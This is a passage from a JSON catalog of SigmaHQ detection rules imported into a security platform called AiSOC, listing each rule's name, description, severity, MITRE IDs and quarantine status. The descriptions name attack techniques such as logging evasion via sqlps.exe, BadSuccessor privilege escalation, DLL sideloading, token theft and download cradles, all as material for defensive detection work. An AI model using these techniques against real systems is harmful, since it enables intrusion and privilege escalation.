"upstream_path": "rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" } }, { "id": "sigmahq-sigma-00eee2a5-fdb0-4746-a21d-e43fbdea5681", "type": "detection", "name": "Linux Doas Conf File Creation", "description": "Detects the creation of doas.conf file in linux host platform.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-doas-conf-file-creation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" } }, { "id": "sigmahq-sigma-0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "type": "detection", "name": "Detection of PowerShell Execution via Sqlps.exe", "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/detection-of-powershell-execution-via-sqlps-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" } }, { "id": "sigmahq-sigma-01aeb693-138d-49d2-9403-c4f52d7d3d62", "type": "detection", "name": "RDP Connection Allowed Via Netsh.EXE", "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-connection-allowed-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml" } }, { "id": "sigmahq-sigma-01c42d3c-242d-4655-85b2-34f1739632f7", "type": "detection", "name": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", "description": "Detects usage of Dsacls to grant over permissive permissions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-over-permissive-permissions-granted-using-dsacls-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01c42d3c-242d-4655-85b2-34f1739632f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" } }, { "id": "sigmahq-sigma-01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "type": "detection", "name": "Uncommon Svchost Parent Process", "description": "Detects an uncommon svchost parent process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-svchost-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-02030f2f-6199-49ec-b258-ea71b07e03dc", "type": "detection", "name": "Malicious PowerShell Commandlets - ProcessCreation", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" } }, { "id": "sigmahq-sigma-02122374-b74e-495c-b285-9e4da973f3d6", "type": "detection", "name": "DMSA Service Account Created in Specific OUs - PowerShell", "description": "Detects the creation of a dMSA service account using the New-ADServiceAccount cmdlet in certain OUs.\nThe fact that the cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious.\nIt is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.\nOn top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions,\nit is a strong signal of an attempted or successful abuse of the BaDSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dmsa-service-account-created-in-specific-ous-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02122374-b74e-495c-b285-9e4da973f3d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_create_new_dmsasvc_account.yml" } }, { "id": "sigmahq-sigma-021310d9-30a6-480a-84b7-eaa69aeb92bb", "type": "detection", "name": "First Time Seen Remote Named Pipe - Zeek", "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/first-time-seen-remote-named-pipe-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "021310d9-30a6-480a-84b7-eaa69aeb92bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" } }, { "id": "sigmahq-sigma-022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "type": "detection", "name": "HackTool - Wmiexec Default Powershell Command", "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-wmiexec-default-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml" } }, { "id": "sigmahq-sigma-023394c4-29d5-46ab-92b8-6a534c6f447b", "type": "detection", "name": "Suspicious HWP Sub Processes", "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1203", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hwp-sub-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" } }, { "id": "sigmahq-sigma-023c654f-8f16-44d9-bb2b-00ff36a62af9", "type": "detection", "name": "Python Function Execution Security Warning Disabled In Excel", "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-function-execution-security-warning-disabled-in-excel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "023c654f-8f16-44d9-bb2b-00ff36a62af9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_office_disable_python_security_warnings.yml" } }, { "id": "sigmahq-sigma-0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "type": "detection", "name": "ISO Image Mounted", "description": "Detects the mount of an ISO image on an endpoint", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-image-mounted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_iso_mount.yml" } }, { "id": "sigmahq-sigma-0250638a-2b28-4541-86fc-ea4c558fa0c6", "type": "detection", "name": "Suspicious Browser Child Process - MacOS", "description": "Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1189", "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-browser-child-process-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0250638a-2b28-4541-86fc-ea4c558fa0c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" } }, { "id": "sigmahq-sigma-0255a820-e564-4e40-af2b-6ac61160335c", "type": "detection", "name": "A New Trust Was Created To A Domain", "description": "Addition of domains is seldom and should be verified for legitimacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-new-trust-was-created-to-a-domain.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0255a820-e564-4e40-af2b-6ac61160335c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" } }, { "id": "sigmahq-sigma-025bd229-fd1f-4fdb-97ab-20006e1a5368", "type": "detection", "name": "Unusual File Download from Direct IP Address", "description": "Detects the download of suspicious file type from URLs with IP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-download-from-direct-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" } }, { "id": "sigmahq-sigma-025c9fe7-db72-49f9-af0d-31341dd7dd57", "type": "detection", "name": "Azure Firewall Rule Collection Modified or Deleted", "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-rule-collection-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-02773bed-83bf-469f-b7ff-e676e7d78bab", "type": "detection", "name": "BloodHound Collection Files", "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002", "T1482", "T1069.001", "T1069.002", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bloodhound-collection-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" } }, { "id": "sigmahq-sigma-028c7842-4243-41cd-be6f-12f3cf1a26c7", "type": "detection", "name": "AD Object WriteDAC Access", "description": "Detects WRITE_DAC access to a domain object", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-object-writedac-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" } }, { "id": "sigmahq-sigma-02b18447-ea83-4b1b-8805-714a8a34546a", "type": "detection", "name": "Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution", "description": "Detects execution of Windows Defender \"OfflineScannerShell.exe\" from its non standard directory.\nThe \"OfflineScannerShell.exe\" binary is vulnerable to DLL side loading and will load any DLL named \"mpclient.dll\" from the current working directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading-via-offlinescannershell-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02b18447-ea83-4b1b-8805-714a8a34546a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml" } }, { "id": "sigmahq-sigma-02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "type": "detection", "name": "Potential COM Objects Download Cradles Usage - Process Creation", "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-objects-download-cradles-usage-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" } }, { "id": "sigmahq-sigma-02c39d30-02b5-45d2-b435-8aebfe5a8629", "type": "detection", "name": "A Member Was Removed From a Security-Enabled Global Group", "description": "Detects activity when a member is removed from a security-enabled global group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-member-was-removed-from-a-security-enabled-global-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02c39d30-02b5-45d2-b435-8aebfe5a8629", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" } }, { "id": "sigmahq-sigma-02cf536a-cf21-4876-8842-4159c8aee3cc", "type": "detection", "name": "Github Push Protection Bypass Detected", "description": "Detects when a user bypasses the push protection on a secret detected by secret scanning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-push-protection-bypass-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02cf536a-cf21-4876-8842-4159c8aee3cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_push_protection_bypass_detected.yml" } }, { "id": "sigmahq-sigma-02d1d718-dd13-41af-989d-ea85c7fab93f", "type": "detection", "name": "Rare Remote Thread Creation By Uncommon Source Image", "description": "Detects uncommon processes creating remote threads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rare-remote-thread-creation-by-uncommon-source-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02d1d718-dd13-41af-989d-ea85c7fab93f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml" } }, { "id": "sigmahq-sigma-02ee49e2-e294-4d0f-9278-f5b3212fc588", "type": "detection", "name": "New RUN Key Pointing to Suspicious Folder", "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-run-key-pointing-to-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" } }, { "id": "sigmahq-sigma-02f7c9c1-1ae8-4c6a-8add-04693807f92f", "type": "detection", "name": "Potential Access Token Abuse", "description": "Detects potential token impersonation and theft. Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-access-token-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml" } }, { "id": "sigmahq-sigma-0322d9f2-289a-47c2-b5e1-b63c90901a3e", "type": "detection", "name": "Google Cloud Kubernetes RoleBinding", "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-rolebinding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml" } }, { "id": "sigmahq-sigma-0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "type": "detection", "name": "Triple Cross eBPF Rootkit Execve Hijack", "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-execve-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" } }, { "id": "sigmahq-sigma-03409c93-a7c7-49ba-9a4c-a00badf2a153", "type": "detection", "name": "Troubleshooting Pack Cmdlet Execution", "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/troubleshooting-pack-cmdlet-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" } }, { "id": "sigmahq-sigma-03552375-cc2c-4883-bbe4-7958d5a980be", "type": "detection", "name": "HackTool - SILENTTRINITY Stager Execution", "description": "Detects SILENTTRINITY stager use via PE metadata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-silenttrinity-stager-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "03552375-cc2c-4883-bbe4-7958d5a980be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml" } }, { "id": "sigmahq-sigma-0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "type": "detection", "name": "Disable Privacy Settings Experience in Registry", "description": "Detects registry modifications that disable Privacy Settings Experience", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-privacy-settings-experience-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" } }, { "id": "sigmahq-sigma-037dcd71-33a8-4392-bb01-293c94663e5a", "type": "detection", "name": "File Decryption Using Gpg4win", "description": "Detects usage of Gpg4win to decrypt files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-decryption-using-gpg4win.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 